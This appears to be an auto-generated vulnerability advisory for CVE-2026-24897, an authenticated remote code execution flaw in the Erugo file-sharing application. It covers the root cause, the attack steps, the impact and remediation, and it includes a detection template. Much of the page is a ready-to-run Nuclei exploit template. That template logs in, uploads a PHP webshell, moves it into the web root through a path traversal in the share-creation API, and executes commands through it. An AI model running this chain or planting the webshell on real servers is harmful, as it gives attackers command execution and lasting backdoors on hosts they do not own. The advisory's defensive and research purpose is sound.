[webapps] Erugo 0.2.14 - Remote Code Execution (RCE)
CVE-2026-24897
Erugo <= 0.2.14 contains an authenticated remote code execution vulnerability. A logged-in user can upload a PHP file through the Tus resumable-upload endpoint and then, by supplying a traversal path in the share-creation API, have the server move that file into the public web root, where the PHP interpreter executes it on request.
Critical · CVSS 9.8
📋 Basic vulnerability information
| CVE | CVE-2026-24897 |
|---|---|
| Vulnerability type | Remote code execution via file upload and path traversal at share creation |
| Affected versions | Erugo <= 0.2.14 |
| Severity | Critical · CVSS 9.8 |
| Published | 2026-04-30 |
| Submitted by | Abdul Moiz |
| Source | Exploit-DB (EDB-ID 52012) |
🔬 Root cause
Erugo accepts uploads from authenticated users over the Tus resumable-upload protocol (POST /files/ to create an upload, PATCH /files/{id} to send the bytes). Neither the file name nor the content is restricted, so a .php file is stored as-is. When the user then turns uploads into a share (POST /api/uploads/create-share-from-uploads), the request body carries a client-controlled filePaths mapping that tells the server where, relative to the share, each uploaded file should be placed. Versions up to 0.2.14 use these values without canonicalising them or checking that the result stays inside the share directory, so a value such as ../../../../../public/nucleirce.php makes the server write the uploaded file into the application's public web root. Erugo is a PHP application, and a .php file that lands in that directory is executed by the PHP interpreter when it is requested. The upload is only the delivery vehicle; the defect is the missing path-containment check at share creation, not the parsing of script files in an upload directory.
🎯 Attack scenario
1. The attacker authenticates with a valid Erugo account (POST /api/auth/login) and receives a Bearer token; the whole chain requires credentials.
2. The attacker creates a Tus upload (POST /files/ with Upload-Length set to the shell's size and Upload-Metadata naming the file, e.g. nucleirce.php); the server answers 201 with the upload id in the Location header.
3. The attacker sends the PHP webshell as the upload body (PATCH /files/{id}, Content-Type application/offset+octet-stream, Upload-Offset 0); the server answers 204.
4. The attacker creates a share from that upload (POST /api/uploads/create-share-from-uploads) with a filePaths entry of ../../../../../public/nucleirce.php; the server moves the uploaded file into the web root.
5. The attacker requests GET /nucleirce.php?cmd=id without any token; PHP runs the shell and the response carries the command output.
Success indicator: the output of id (uid=... gid=...) or of another command in the step 5 response, i.e. arbitrary command execution as the web-server user.
Caveat: the chain needs a valid login, so the 9.8 score shown on this page (a vector with no privileges required) overstates it; an authenticated low-privilege chain with the same impact scores 8.8 under CVSS 3.x. The exploit also depends on the number of ../ steps matching the server's storage layout and on the web server executing .php files placed in public/ other than index.php.
💥 Impact
An attacker holding any valid account can execute arbitrary system commands on the server as the web-server user. That gives full remote control of the host, access to every file shared through the instance, and the ability to plant persistent backdoors.
⚔️ Nuclei exploit template
The following exploit template in Nuclei v3 format can be used directly to verify the vulnerability. Note that it needs working credentials (variables username and password) and that it leaves a webshell in the target's web root, which has to be removed afterwards:
```yaml
id: CVE-2026-24897-exploit

info:
  name: Erugo <= 0.2.14 - Authenticated Remote Code Execution (RCE)
  author: nuclei-template-generator
  severity: critical
  description: |
    Erugo <= 0.2.14 is vulnerable to authenticated RCE. An authenticated user can
    upload a PHP webshell via the Tus protocol, then exploit a path traversal
    vulnerability in the share creation API to move the shell into the public
    web root, achieving remote code execution.
  reference:
    - https://github.com/ErugoOSS/Erugo
    - https://www.exploit-db.com/exploits/52012
  tags: erugo,rce,exploit,cve-2026-24897,authenticated,path-traversal,tus

variables:
  username: "admin@example.com"
  password: "password"
  cmd: "id"
  shell_name: "nucleirce.php"
  shell_content: "<?php system($_GET[\"cmd\"]); ?>"

http:
  # Step 1: log in and extract the Bearer token
  - raw:
      - |
        POST /api/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept: application/json
        User-Agent: Mozilla/5.0 (Exploit-DB)

        {"email":"{{username}}","password":"{{password}}"}

    matchers:
      - type: status
        status:
          - 200

    extractors:
      - type: json
        name: token
        part: body
        json:
          - ".data.access_token"
        internal: true

  # Step 2: Tus protocol - create the upload; the Location header carries the file id.
  # Upload-Metadata values are base64: filename = nucleirce.php, filetype = application/x-php.
  # Upload-Length must equal the byte length of the shell sent in step 3 (30 bytes).
  - raw:
      - |
        POST /files/ HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}
        Accept: application/json
        User-Agent: Mozilla/5.0 (Exploit-DB)
        Tus-Resumable: 1.0.0
        Upload-Length: 30
        Upload-Metadata: filename bnVjbGVpcmNlLnBocA==,filetype YXBwbGljYXRpb24veC1waHA=

    matchers:
      - type: status
        status:
          - 201

    extractors:
      - type: regex
        name: file_location
        part: header
        regex:
          - "(?i)location:\\s*(.+)"
        group: 1
        internal: true
      - type: regex
        name: file_id
        part: header
        regex:
          - "(?i)location:\\s*.*/files/([^\\s\\r\\n]+)"
        group: 1
        internal: true

  # Step 3: Tus protocol - send the PHP shell body (PATCH). The block scalar is
  # "|-" so no trailing newline is added to the 30-byte body.
  - raw:
      - |-
        PATCH /files/{{file_id}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}
        Accept: application/json
        User-Agent: Mozilla/5.0 (Exploit-DB)
        Tus-Resumable: 1.0.0
        Content-Type: application/offset+octet-stream
        Upload-Offset: 0
        Content-Length: 30

        <?php system($_GET["cmd"]); ?>

    matchers:
      - type: status
        status:
          - 204

  # Step 4: create a share from the upload; the traversal in filePaths moves the
  # shell into the public web root.
  - raw:
      - |
        POST /api/uploads/create-share-from-uploads HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}
        Content-Type: application/json
        Accept: application/json
        User-Agent: Mozilla/5.0 (Exploit-DB)

        {
          "upload_id": "exploit",
          "name": "exploit_share",
          "recipients": [],
          "uploadIds": ["{{file_id}}"],
          "filePaths": {
            "{{file_id}}": "../../../../../public/{{shell_name}}"
          },
          "expiry_date": "2099-12-31T23:59:59.000Z",
          "password": "",
          "password_confirm": ""
        }

    matchers:
      - type: status
        status:
          - 200
          - 201

  # Step 5: execute the command through the webshell and verify RCE
  - raw:
      - |
        GET /{{shell_name}}?cmd={{cmd}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Exploit-DB)
        Accept: */*

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+\\([^)]+\\)\\s+gid=[0-9]+"
          - "root:[x*]:0:0"
          - "[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+"
        condition: or

    extractors:
      - type: regex
        name: rce-output
        part: body
        regex:
          - "uid=[0-9]+\\([^)]+\\).*"
          - "(.+)"
```
The third body pattern in step 5 (anything of the form user@host) is loose and will also match e-mail addresses in an ordinary page, so treat a hit on that pattern alone as unconfirmed and rely on the uid=/gid= output of the default cmd.
🔍 Nuclei detection template
The following template fingerprints Erugo instances and extracts a version string where the page exposes one. Without an exposed version it only identifies the product; it does not confirm that the instance is vulnerable, and it cannot exercise the chain because that requires credentials:
```yaml
id: CVE-2026-24897-detection

info:
  name: Erugo <= 0.2.14 - Version Detection
  author: nuclei-template-generator
  severity: critical
  description: |
    Detects Erugo instances and extracts a version string where one is exposed.
    Versions 0.2.14 and earlier are vulnerable to authenticated RCE via path
    traversal during file share creation.
  reference:
    - https://github.com/ErugoOSS/Erugo
    - https://www.exploit-db.com/exploits/52012
  tags: erugo,rce,detection,cve-2026-24897

http:
  - method: GET
    path:
      - "{{BaseURL}}/"
      - "{{BaseURL}}/login"

    stop-at-first-match: true
    # Both conditions must hold: a bare status matcher ORed with the word
    # matcher would flag every host that returns 200.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        name: erugo-fingerprint
        part: body
        words:
          - "Erugo"
          - "erugo"
        condition: or

    extractors:
      - type: regex
        name: erugo-version
        part: body
        group: 1
        regex:
          - "(?i)erugo[^0-9]*([0-9]+\\.[0-9]+\\.[0-9]+)"
          - "version[\"']?\\s*[:\\s]+[\"']?([0-9]+\\.[0-9]+\\.[0-9]+)"
```
🛡️ Remediation
1. Upgrade to Erugo 0.2.15 or later (the page reports the issue as fixed upstream).
2. Interim mitigation: configure the web server so that only the application's front controller (public/index.php) is handed to PHP and no other .php file under public/ or under the storage tree is executed; keep upload and share storage outside the document root. Restricting script parsing in an "uploads" directory alone does not address this chain, because the file is moved out of the storage area by the share-creation call.
3. Canonicalise every client-supplied path in filePaths on the server (resolve symlinks and ../ segments) and reject any value that does not resolve to a location inside the share's own directory; additionally validate uploaded file names and content against an allowlist of expected types rather than a denylist of extensions.
📎 References
- https://www.exploit-db.com/exploits/52012
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24897
⚠️ This article is based on public vulnerability databases and is provided for security research and defensive reference only. Generated: 2026-05-07 05:29 | Source: Exploit-DB